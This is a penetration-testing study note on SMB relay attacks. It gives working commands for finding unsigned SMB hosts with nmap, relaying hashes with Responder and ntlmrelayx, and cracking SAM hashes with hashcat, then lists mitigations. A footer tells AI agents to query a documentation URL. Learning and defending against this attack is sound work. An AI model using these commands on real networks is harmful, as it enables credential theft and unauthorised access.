# SMB Relay ## Overview Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access. However**,** SMB signing **MUST BE DISABLED** or **NOT ENFORCED** on target and the relayed credentials must be local administrator on the machine for any real value ## Identify Hosts Without SMB Signing ```bash nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24 ``` ### Desired Output ```bash PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required ``` ## Edit Responder Configuration File ```bash sudo vim /etc/responder/Responder.conf SMB = off HTTP = off ``` ## Responder + SMB Relay ```bash sudo responder -I etho0 -dwv impacket-ntlmrelayx -tf targets.txt -smb2support ``` ## Crack SAM Hashes ```bash hashcat -m 1000 crackme.txt ~/rockyou.txt -O ``` ## Mitigation * Enable SMB Signing on all devices * Pro: Completely stops the attacks * Con: Performance issues may arise with file copies * Disable NTLM authentication on the Network * Pros: Completely stops the attack * Con: If Kerberos stops working, Windows defaults back to NTLM * Limit Domain Admins for specific tasks * Local Administrator restrictions --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/active-directory/initial-attack-strategy/smb-relay.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.